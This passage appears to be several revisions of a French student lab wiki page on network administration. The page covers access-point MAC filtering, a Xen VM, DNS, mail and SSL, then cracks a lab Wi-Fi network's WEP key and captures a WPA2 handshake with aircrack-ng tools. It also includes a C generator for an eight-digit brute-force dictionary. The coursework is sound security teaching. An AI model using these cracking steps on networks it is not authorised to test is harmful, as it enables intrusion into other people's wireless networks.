Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
<br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23104
TP sysres IMA2a5 2015/2016 G3
2015-11-20T11:21:08Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de la machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h4>Recuperation du certificat SSL</h4><br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
<br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
<br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23095
TP sysres IMA2a5 2015/2016 G3
2015-11-20T10:21:03Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
